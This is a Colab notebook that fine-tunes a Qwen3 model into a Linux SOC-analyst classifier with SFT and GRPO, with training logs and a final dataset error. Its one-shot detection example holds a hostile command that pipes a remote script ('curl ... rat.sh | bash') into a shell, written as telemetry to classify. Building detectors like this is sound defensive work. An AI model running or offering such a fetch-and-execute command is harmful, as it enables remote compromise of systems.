# üõ°Ô∏è Sys-Scan Logic Engine: The 'Pass 2' Pipeline
**Logic-First Training: SFT Primer + Causal GRPO (Drive Safetensors)**

This pipeline trains your **Drive-hosted model** (`Qwen3_analyst`).
**Targeting:** Merged Safetensors (ignoring GGUF/Shards in the same dir).

**Strategy:**
1.  **Phase 1 (SFT):** Structural Priming (`sft_pass2.jsonl`).
2.  **Phase 2 (GRPO):** Reasoning Optimization (`grpo_pass2.jsonl`).
3.  **Phase 3 (Export):** Merges the 'Logic Adapter' and chunks it for deployment.

In [1]:
%%capture
import os
os.environ["UNSLOTH_VLLM_STANDBY"] = "1" # [NEW] Extra 30% context lengths!
if "COLAB_" not in "".join(os.environ.keys()):
    # If you're not in Colab, just use pip install or uv pip install
    !pip install unsloth vllm
else:
    pass # For Colab / Kaggle, we need extra instructions hidden below \/

In [2]:
#@title Colab Extra Install { display-mode: "form" }
%%capture
import os
!pip install --upgrade -qqq uv
if "COLAB_" not in "".join(os.environ.keys()):
    # If you're not in Colab, just use pip install!
    !pip install unsloth vllm
else:
    try: import numpy, PIL; get_numpy = f"numpy=={numpy.__version__}"; get_pil = f"pillow=={PIL.__version__}"
    except: get_numpy = "numpy"; get_pil = "pillow"
    try: import subprocess; is_t4 = "Tesla T4" in str(subprocess.check_output(["nvidia-smi"]))
    except: is_t4 = False
    get_vllm, get_triton = ("vllm==0.9.2", "triton==3.2.0") if is_t4 else ("vllm==0.10.2", "triton")
    !uv pip install -qqq --upgrade \
        unsloth {get_vllm} {get_numpy} {get_pil} torchvision bitsandbytes xformers
    !uv pip install -qqq {get_triton}
!uv pip install transformers==4.56.2
!uv pip install --no-deps trl==0.22.2

In [3]:
# @title 1. Environment Setup
import os
from google.colab import drive

# 1. Mount Drive
if not os.path.exists('/content/drive'):
    drive.mount('/content/drive')

# 2. Login to Hugging Face (Required for pulling the DATASETS)
from huggingface_hub import login
from google.colab import userdata
try:
    login(token=userdata.get('HF_TOKEN'))
except:
    login() # Interactive login if secret not found

In [4]:
# @title 2. Load Safetensors from Google Drive
from unsloth import FastLanguageModel
import torch
import os

# --- DEFINE THE MODEL PATH HERE ---
MODEL_ID = "/content/drive/MyDrive/Qwen3_analyst"

max_seq_length = 2048
dtype = None # Auto detection
load_in_4bit = True

print(f"üìÇ Loading model from Drive: {MODEL_ID}...")
print("   - Targeting: config.json + model-*.safetensors")
print("   - Ignoring: .gguf and other shards")

# Verify path exists first
if not os.path.exists(MODEL_ID):
    raise FileNotFoundError(f"‚ùå Could not find model directory: {MODEL_ID}\nPlease check your Drive path.")

# Unsloth defaults to loading 'config.json' and the associated safetensors map
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = MODEL_ID,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
    gpu_memory_utilization = 0.7,
)
print("‚úÖ Drive Model (Safetensors) Loaded Successfully.")

ü¶• Unsloth: Will patch your computer to enable 2x faster free finetuning.
INFO 12-28 17:06:37 [__init__.py:216] Automatically detected platform cuda.
ü¶• Unsloth Zoo will now patch everything to make training faster!
üìÇ Loading model from Drive: /content/drive/MyDrive/Qwen3_analyst...
   - Targeting: config.json + model-*.safetensors
   - Ignoring: .gguf and other shards
==((====))==  Unsloth 2025.12.9: Fast Qwen3 patching. Transformers: 4.56.2. vLLM: 0.10.2.
   \\   /|    NVIDIA L4. Num GPUs = 1. Max memory: 22.161 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.8.0+cu128. CUDA: 8.9. CUDA Toolkit: 12.8. Triton: 3.4.0
\        /    Bfloat16 = TRUE. FA [Xformers = 0.0.32.post1. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!


Loading checkpoint shards:   0%|          | 0/2 [00:00<?, ?it/s]

‚úÖ Drive Model (Safetensors) Loaded Successfully.


In [5]:
# @title 0. Global Configuration (Linux-Native Protocol)
import json

# REVISED: Strictly Linux-focused reasoning
SYSTEM_PROMPT_DICT = {
    "role": "Tier 3 SOC Analyst & Linux Systems Specialist",
    "objective": "Analyze Linux system telemetry to identify security incidents with high precision.",
    "cognitive_framework": {
        "instruction": "Perform deep reasoning in a <think> block. Validate against Linux standards (FHS, standard PIDs, UID contexts).",
        "steps": [
            "1. Observation: Extract facts (User, PID, Parent Process, Command, Args).",
            "2. Context: Is this standard behavior for a Linux Server? (e.g., 'root' vs 'www-data').",
            "3. Hypothesis: Map to MITRE ATT&CK for Linux (e.g., T1059.004 Unix Shell).",
            "4. Evidence: (+) Anomalous Parent/Child relations. (-) Legitimate Cron/Admin tasks.",
            "5. Verdict: Risk score based on potential system compromise."
        ]
    },
    "response_format": {
        "structure": "<think>...</think><answer>...</answer>",
        "answer_schema": {
            "risk_score": "int (0-100)",
            "severity": "str (LOW|MEDIUM|HIGH|CRITICAL)",
            "category": "str (e.g., 'Web Shell', 'Privilege Escalation')"
        }
    },
    "constraints": [
        "Ignore Windows artifacts (.exe, Registry) unless explicitly Wine-related.",
        "Focus on Linux primitives (syscalls, UIDs, capabilities).",
        "Output strictly valid JSON inside the <answer> tag."
    ]
}

SYSTEM_PROMPT = json.dumps(SYSTEM_PROMPT_DICT, indent=2)

# REVISED ONE-SHOT: Classic RCE Scenario (php-fpm -> sh)
ONE_SHOT = """
User Input:
{
  "title": "Suspicious Web Process",
  "description": "Process 'sh' executed with '-c curl -s http://192.168.1.50/rat.sh | bash'",
  "metadata": {
    "parent": "php-fpm7.4",
    "user": "www-data",
    "uid": 33,
    "cwd": "/var/www/html/uploads"
  }
}

Model Response:
<think>
1. Observation: The 'php-fpm' service (Web Processor) spawned a shell ('sh') which piped a remote script from an IP into 'bash'.
2. Context: The 'www-data' user is a service account for web content. It should NEVER spawn interactive shells or download executables.
3. Hypothesis: Remote Code Execution (RCE) via web vulnerability (MITRE T1190). The command attempts to fetch and execute a reverse shell or beacon (T1059.004).
4. Evidence:
   (+) Parent/Child violation (Web Server -> Shell).
   (+) 'curl | bash' pattern is a hallmark of droppers.
   (+) CWD is a writable upload directory, suggesting a webshell upload.
   (-) No legitimate admin workflow uses 'www-data' to fetch scripts.
5. Verdict: Confirmed RCE. Critical system compromise.
</think>
<answer>
{"risk_score": 100, "severity": "CRITICAL", "category": "Remote Code Execution (RCE)"}
</answer>"""

FULL_PROMPT_STR = f"{SYSTEM_PROMPT}\n\n**EXAMPLE:**{ONE_SHOT}"
print("‚úÖ Protocol Updated (Linux Mode).")

‚úÖ Protocol Updated (Linux Mode).


In [6]:
# @title üì• Download Datasets
from huggingface_hub import hf_hub_download
import shutil
import os

REPO_ID = "jmazz/sys-scan_synthetic_dataset_v2"
FILES = ["sft_pass2.jsonl", "grpo_pass2.jsonl", "pass2_eval.jsonl"]

print("‚¨áÔ∏è pulling datasets from Hugging Face...")

for filename in FILES:
    try:
        # Download from Hub to Cache
        cached_path = hf_hub_download(repo_id=REPO_ID, filename=filename, repo_type="dataset")

        # Copy from Cache to Current Directory (so the loader finds 'sft_pass2.jsonl')
        shutil.copy(cached_path, filename)
        print(f"‚úÖ Ready: {filename}")
    except Exception as e:
        print(f"‚ùå Failed to download {filename}: {e}")

print("\nüöÄ Files are now local. You can proceed with training.")

‚¨áÔ∏è pulling datasets from Hugging Face...
‚úÖ Ready: sft_pass2.jsonl
‚úÖ Ready: grpo_pass2.jsonl
‚úÖ Ready: pass2_eval.jsonl

üöÄ Files are now local. You can proceed with training.


In [7]:
# @title üõ†Ô∏è Fix Dataset Schema (The "Nuclear" Option)
import json
from huggingface_hub import hf_hub_download

# 1. Configuration
REPO_ID = "jmazz/sys-scan_synthetic_dataset_v2"
FILES_TO_FIX = ["sft_pass2.jsonl", "grpo_pass2.jsonl"]

def sanitize_and_fix(filename):
    print(f"üîß Downloading and fixing {filename}...")

    # Download raw file from Hub
    try:
        local_path = hf_hub_download(repo_id=REPO_ID, filename=filename, repo_type="dataset")
    except Exception as e:
        print(f"‚ùå Failed to download {filename}: {e}")
        return None

    fixed_path = f"fixed_{filename}"

    with open(local_path, 'r', encoding='utf-8') as infile, \
         open(fixed_path, 'w', encoding='utf-8') as outfile:

        for i, line in enumerate(infile):
            try:
                record = json.loads(line)

                # --- THE FIX: Stringify EVERYTHING in Metadata ---
                if "metadata" in record and isinstance(record["metadata"], dict):
                    # Create a new dict to avoid modifying while iterating
                    clean_metadata = {}
                    for k, v in record["metadata"].items():
                        # Force string conversion for ALL values (bools, ints, floats, lists)
                        clean_metadata[k] = str(v)

                    record["metadata"] = clean_metadata

                outfile.write(json.dumps(record) + "\n")
            except Exception as e:
                print(f"‚ö†Ô∏è Skipped malformed line {i}: {e}")

    print(f"‚úÖ Saved robust version to: {fixed_path}")
    return fixed_path

# 2. Run the fix
fixed_sft_path = sanitize_and_fix("sft_pass2.jsonl")
fixed_grpo_path = sanitize_and_fix("grpo_pass2.jsonl")

print("\nüéâ Datasets are now strictly typed. Re-run your loader cells.")

üîß Downloading and fixing sft_pass2.jsonl...
‚úÖ Saved robust version to: fixed_sft_pass2.jsonl
üîß Downloading and fixing grpo_pass2.jsonl...
‚úÖ Saved robust version to: fixed_grpo_pass2.jsonl

üéâ Datasets are now strictly typed. Re-run your loader cells.


In [8]:
# @title 1. Phase 1: Structural Priming (SFT on Your Drive Model)
from unsloth import FastLanguageModel
from trl import SFTTrainer, SFTConfig
from datasets import Dataset
import json
import os
import shutil

# --- CLEANUP ---
if os.path.exists("sft_primer_adapter"): shutil.rmtree("sft_primer_adapter")
if os.path.exists("sft_merged_temp"): shutil.rmtree("sft_merged_temp")

# --- LOAD YOUR PRETRAINED MODEL ---
# Pointing to your specific drive location
MODEL_PATH = "/content/drive/MyDrive/Qwen3_analyst"

print(f"üèóÔ∏è Loading Pretrained Analyst from: {MODEL_PATH}...")
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = MODEL_PATH,
    max_seq_length = 4096,
    load_in_4bit = True,
    gpu_memory_utilization = 0.6,
)

model = FastLanguageModel.get_peft_model(
    model,
    r = 64,
    target_modules = ["q_proj", "k_proj", "v_proj", "o_proj", "gate_proj", "up_proj", "down_proj"],
    lora_alpha = 64,
    use_gradient_checkpointing = "unsloth",
    random_state = 3407,
)

# --- DATASET FORMATTING (Injecting the JSON Protocol) ---
def load_sft_data(file_path):
    def gen():
        with open(file_path, 'r') as f:
            for line in f:
                if line.strip():
                    try:
                        row = json.loads(line)
                        # Reconstruct prompt with JSON Protocol
                        user_content = json.dumps({
                            "title": row.get("title"),
                            "description": row.get("description"),
                            "metadata": row.get("metadata")
                        }, indent=2)

                        target_response = row.get("output") or row.get("response")

                        full_text = f"<|im_start|>system\n{FULL_PROMPT_STR}<|im_end|>\n" \
                                    f"<|im_start|>user\n{user_content}<|im_end|>\n" \
                                    f"<|im_start|>assistant\n{target_response}<|im_end|>"
                        yield {"text": full_text}
                    except: continue
    return Dataset.from_generator(gen)

print("üìÇ Loading SFT Dataset...")
dataset_sft = load_sft_data("sft_pass2.jsonl")

# --- TRAIN ---
trainer = SFTTrainer(
    model = model,
    tokenizer = tokenizer,
    train_dataset = dataset_sft,
    dataset_text_field = "text",
    max_seq_length = 4096,
    args = SFTConfig(
        per_device_train_batch_size = 8,
        gradient_accumulation_steps = 4,
        warmup_steps = 10,
        max_steps = 60, # Quick primer to learn the JSON syntax
        learning_rate = 2e-4,
        fp16 = not torch.cuda.is_bf16_supported(),
        bf16 = torch.cuda.is_bf16_supported(),
        logging_steps = 5,
        output_dir = "sft_primer_adapter",
        report_to = "none",
        dataset_num_proc = 2,
    ),
)

print("üöÄ Starting SFT Primer on Qwen3_analyst...")
trainer.train()

print("üíæ Saving SFT Adapter...")
model.save_pretrained("sft_primer_adapter")
print("‚úÖ SFT Phase Complete.")

üèóÔ∏è Loading Pretrained Analyst from: /content/drive/MyDrive/Qwen3_analyst...
==((====))==  Unsloth 2025.12.9: Fast Qwen3 patching. Transformers: 4.56.2. vLLM: 0.10.2.
   \\   /|    NVIDIA L4. Num GPUs = 1. Max memory: 22.161 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.8.0+cu128. CUDA: 8.9. CUDA Toolkit: 12.8. Triton: 3.4.0
\        /    Bfloat16 = TRUE. FA [Xformers = 0.0.32.post1. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!


Loading checkpoint shards:   0%|          | 0/2 [00:00<?, ?it/s]

Unsloth 2025.12.9 patched 36 layers with 36 QKV layers, 36 O layers and 36 MLP layers.


üìÇ Loading SFT Dataset...


Generating train split: 0 examples [00:00, ? examples/s]

Unsloth: Tokenizing ["text"] (num_proc=2):   0%|          | 0/571 [00:00<?, ? examples/s]

ü¶• Unsloth: Padding-free auto-enabled, enabling faster training.
üöÄ Starting SFT Primer on Qwen3_analyst...


==((====))==  Unsloth - 2x faster free finetuning | Num GPUs used = 1
   \\   /|    Num examples = 571 | Num Epochs = 4 | Total steps = 60
O^O/ \_/ \    Batch size per device = 8 | Gradient accumulation steps = 4
\        /    Data Parallel GPUs = 1 | Total batch size (8 x 4 x 1) = 32
 "-____-"     Trainable parameters = 132,120,576 of 4,154,588,672 (3.18% trained)


Unsloth: Will smartly offload gradients to save VRAM!


Step,Training Loss
5,2.3045
10,1.4149
15,0.6214
20,0.2942
25,0.2324
30,0.1897
35,0.1612
40,0.1455
45,0.1405
50,0.1199


üíæ Saving SFT Adapter...
‚úÖ SFT Phase Complete.


In [9]:
# @title 2. The Bridge: Merge SFT Adapter
import gc
import torch

# Clean memory from Phase 1
del model, tokenizer, trainer
gc.collect()
torch.cuda.empty_cache()

print("üîÑ Merging SFT Adapter into Base...")

# Load Adapter
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = "sft_primer_adapter",
    max_seq_length = 4096,
    load_in_4bit = True,
)

# Merge to Disk
model.save_pretrained_merged(
    "sft_merged_temp",
    tokenizer,
    save_method = "merged_16bit",
)

# Cleanup
del model, tokenizer
gc.collect()
torch.cuda.empty_cache()
print("‚úÖ Merge Complete. Ready for GRPO.")

üîÑ Merging SFT Adapter into Base...
==((====))==  Unsloth 2025.12.9: Fast Qwen3 patching. Transformers: 4.56.2. vLLM: 0.10.2.
   \\   /|    NVIDIA L4. Num GPUs = 1. Max memory: 22.161 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.8.0+cu128. CUDA: 8.9. CUDA Toolkit: 12.8. Triton: 3.4.0
\        /    Bfloat16 = TRUE. FA [Xformers = 0.0.32.post1. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!


Loading checkpoint shards:   0%|          | 0/2 [00:00<?, ?it/s]

Detected local model directory: /content/drive/MyDrive/Qwen3_analyst
Found HuggingFace hub cache directory: /root/.cache/huggingface/hub


Unsloth: Preparing safetensor model files:  50%|‚ñà‚ñà‚ñà‚ñà‚ñà     | 1/2 [00:13<00:13, 13.26s/it]

Copied model-00001-of-00002.safetensors from local model directory


Unsloth: Preparing safetensor model files: 100%|‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà| 2/2 [00:21<00:00, 10.78s/it]


Copied model-00002-of-00002.safetensors from local model directory


Unsloth: Merging weights into 16bit: 100%|‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà| 2/2 [00:25<00:00, 12.93s/it]


Unsloth: Merge process complete. Saved to `/content/sft_merged_temp`
‚úÖ Merge Complete. Ready for GRPO.


In [10]:
# @title 3. Phase 2: Logic Optimization (GRPO)
from trl import GRPOConfig, GRPOTrainer
from unsloth import FastLanguageModel
import re

# --- REWARDS ---
def format_reward(completions, **kwargs):
    # Strict check for the XML tags
    pattern = r"<think>.*?</think>\s*<answer>.*?</answer>"
    return [1.0 if re.search(pattern, c[0]["content"], re.DOTALL) else 0.0 for c in completions]

def analytical_depth_reward(completions, **kwargs):
    # Check for the keywords defined in our JSON schema
    keywords = ["observation", "context", "hypothesis", "evidence", "verdict"]
    rewards = []
    for c in completions:
        match = re.search(r"<think>(.*?)</think>", c[0]["content"], re.DOTALL | re.IGNORECASE)
        if match:
            score = sum(0.2 for k in keywords if k in match.group(1).lower())
            rewards.append(min(1.0, score))
        else:
            rewards.append(0.0)
    return rewards

def risk_math_reward(completions, answer, **kwargs):
    rewards = []
    for c, gt in zip(completions, answer):
        try:
            ans_match = re.search(r"<answer>(.*?)</answer>", c[0]["content"], re.DOTALL)
            if ans_match:
                pred = json.loads(ans_match.group(1)).get("risk_score", 0)
                target = json.loads(gt).get("risk_score", 0)
                diff = abs(pred - target)
                if diff == 0: rewards.append(1.0)
                elif diff <= 5: rewards.append(0.5)
                else: rewards.append(0.0)
            else:
                rewards.append(0.0)
        except:
            rewards.append(0.0)
    return rewards

# --- LOAD MERGED MODEL ---
print("‚ôªÔ∏è Loading Merged Model for RL...")
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = "sft_merged_temp",
    max_seq_length = 4096,
    load_in_4bit = True,
    fast_inference = True, # Enable vLLM
    gpu_memory_utilization = 0.6,
    enforce_eager = True, # Stability fix
)

model = FastLanguageModel.get_peft_model(
    model, r=64,
    target_modules=["q_proj", "k_proj", "v_proj", "o_proj", "gate_proj", "up_proj", "down_proj"],
    lora_alpha=64, use_gradient_checkpointing="unsloth", random_state=3407
)



# --- EXECUTE ---
trainer = GRPOTrainer(
    model = model,
    processing_class = tokenizer,
    reward_funcs = [format_reward, analytical_depth_reward, risk_math_reward],
    args = GRPOConfig(
        output_dir = "final_logic_adapter",
        learning_rate = 5e-6,
        logging_steps = 1,
        bf16 = True,
        per_device_train_batch_size = 1,
        gradient_accumulation_steps = 4,
        num_generations = 4, # Optimized group size
        max_prompt_length = 2048,
        max_completion_length = 768,
        max_steps = 300,
        report_to = "none",
        use_vllm = True,
    ),
    train_dataset = dataset_grpo,
)

print("üöÄ Starting End-to-End GRPO...")
trainer.train()
model.save_pretrained("final_logic_adapter")
print("‚úÖ DONE.")

‚ôªÔ∏è Loading Merged Model for RL...
INFO 12-28 17:28:18 [vllm_utils.py:702] Unsloth: Patching vLLM v1 graph capture
INFO 12-28 17:28:18 [vllm_utils.py:732] Unsloth: Patching vLLM v0 graph capture
==((====))==  Unsloth 2025.12.9: Fast Qwen3 patching. Transformers: 4.56.2. vLLM: 0.10.2.
   \\   /|    NVIDIA L4. Num GPUs = 1. Max memory: 22.161 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.8.0+cu128. CUDA: 8.9. CUDA Toolkit: 12.8. Triton: 3.4.0
\        /    Bfloat16 = TRUE. FA [Xformers = 0.0.32.post1. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!
Unsloth: Standby mode is enabled. Changing `gpu_memory_utilization` to 0.875.
Unsloth: vLLM loading sft_merged_temp with actual GPU utilization = 58.25%
Unsloth: Your GPU has CUDA compute capability 8.9 with VRAM = 22.16 GB.
Unsloth: Using conservativeness = 1.0. Chunked prefill tokens = 4096. Num Sequences = 48.
Unsloth: vLLM's 

`torch_dtype` is deprecated! Use `dtype` instead!


INFO 12-28 17:28:41 [__init__.py:1815] Using max model len 4096
INFO 12-28 17:28:43 [scheduler.py:222] Chunked prefill is enabled with max_num_batched_tokens=4096.
Unsloth: vLLM Bitsandbytes config using kwargs = {'load_in_8bit': False, 'load_in_4bit': True, 'bnb_4bit_compute_dtype': 'bfloat16', 'bnb_4bit_quant_storage': 'uint8', 'bnb_4bit_quant_type': 'fp4', 'bnb_4bit_use_double_quant': False, 'llm_int8_enable_fp32_cpu_offload': False, 'llm_int8_has_fp16_weight': False, 'llm_int8_skip_modules': [], 'llm_int8_threshold': 6.0}
INFO 12-28 17:28:43 [__init__.py:3400] Cudagraph is disabled under eager mode
INFO 12-28 17:28:44 [core.py:76] Initializing a V1 LLM engine (v0.10.2) with config: model='sft_merged_temp', speculative_config=None, tokenizer='sft_merged_temp', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, tokenizer_revision=None, trust_remote_code=False, dtype=torch.bfloat16, max_seq_len=4096, download_dir=None, load_format=bitsandbytes, tensor_parallel_size=1, pipe

Loading safetensors checkpoint shards:   0% Completed | 0/2 [00:00<?, ?it/s]


INFO 12-28 17:28:48 [punica_selector.py:19] Using PunicaWrapperGPU.
INFO 12-28 17:28:49 [gpu_model_runner.py:2392] Model loading took 2.8025 GiB and 2.856138 seconds
INFO 12-28 17:29:03 [backends.py:539] Using cache directory: /root/.cache/vllm/torch_compile_cache/9e4194d584/rank_0_0/backbone for vLLM's torch.compile
INFO 12-28 17:29:03 [backends.py:550] Dynamo bytecode transform time: 12.87 s


Unsloth: Compiling kernels: 100%|‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà| 7/7 [00:00<00:00, 10.42it/s, triton_poi_fused_view_6]

INFO 12-28 17:29:09 [backends.py:194] Cache the graph for dynamic shape for later use



Unsloth: Compiling kernels: 100%|‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà| 11/11 [00:00<00:00, 19.01it/s, triton_poi_fused_view_10]
Unsloth: Compiling kernels: 100%|‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà| 11/11 [00:00<00:00, 460.28it/s, triton_poi_fused_view_10]
Unsloth: Compiling kernels: 100%|‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà| 11/11 [00:00<00:00, 507.46it/s, triton_poi_fused_view_10]
Unsloth: Compiling kernels: 100%|‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà| 11/11 [00:00<00:00, 505.99it/s, triton_poi_fused_view_10]
Unsloth: Compiling kernels: 100%|‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà| 11/11 [00:00<00:00, 486.72it/s, triton_poi_fused_view_10]
Unsloth: Compiling kernels: 100%|‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà| 11/11 [00:00<00:00, 477.61it/s, triton_poi_fused_view_10]
Unsloth: Compiling kernels: 100%|‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà| 11/11 [00:00<00:00, 503.90it/s, triton_poi_fused_view_10]
Unsloth: Compiling kernels: 100%|‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà‚ñà| 11/11 [00:00<00:00, 513.52it/s, triton_poi_fused_view_10]
Unsloth: Compili

INFO 12-28 17:29:58 [backends.py:215] Compiling a graph for dynamic shape takes 52.69 s
INFO 12-28 17:30:54 [monitor.py:34] torch.compile takes 65.56 s in total
INFO 12-28 17:30:56 [gpu_worker.py:298] Available KV cache memory: 9.67 GiB
INFO 12-28 17:30:57 [kv_cache_utils.py:864] GPU KV cache size: 70,416 tokens
INFO 12-28 17:30:57 [kv_cache_utils.py:868] Maximum concurrency for 4,096 tokens per request: 17.19x
INFO 12-28 17:30:57 [gpu_worker.py:391] Free memory on device (14.75/22.16 GiB) on startup. Desired GPU memory utilization is (0.5825155748224938, 12.91 GiB). Actual usage is 2.8 GiB for weight, 0.43 GiB for peak activation, 0.01 GiB for non-torch memory, and 0.0 GiB for CUDAGraph memory. Replace gpu_memory_utilization config with `--kv-cache-memory=10227352064` to fit into requested memory, or `--kv-cache-memory=12207505920` to fully utilize gpu memory. Current kv cache memory in use is 10384638464 bytes.
INFO 12-28 17:30:58 [core.py:218] init engine (profile, create kv cache, 

Loading checkpoint shards:   0%|          | 0/2 [00:00<?, ?it/s]

Some weights of Qwen3ForCausalLM were not initialized from the model checkpoint at sft_merged_temp and are newly initialized: ['lm_head.weight']
You should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.


Performing substitution for additional_keys=set()
Unsloth: Just some info: will skip parsing ['pre_feedforward_layernorm', 'cross_attn_input_layernorm', 'input_layernorm', 'layer_norm2', 'post_layernorm', 'q_norm', 'cross_attn_post_attention_layernorm', 'norm2', 'ffn_norm', 'post_attention_layernorm', 'norm1', 'norm', 'post_feedforward_layernorm', 'layer_norm1', 'attention_norm', 'k_norm']


Generating train split: 0 examples [00:00, ? examples/s]

Generating train split: 0 examples [00:00, ? examples/s]

DatasetGenerationError: An error occurred while generating the dataset

In [None]:
# @title 5. Export
# Merge the final adapter and export to GGUF
if os.path.exists("final_logic_adapter"):
    model.save_pretrained_merged("merged_model", tokenizer, save_method="merged_16bit")
    model.push_to_hub_merged("jmazz/sys-scan-logic-v1", tokenizer, save_method="merged_16bit", token=userdata.get('HF_TOKEN'))
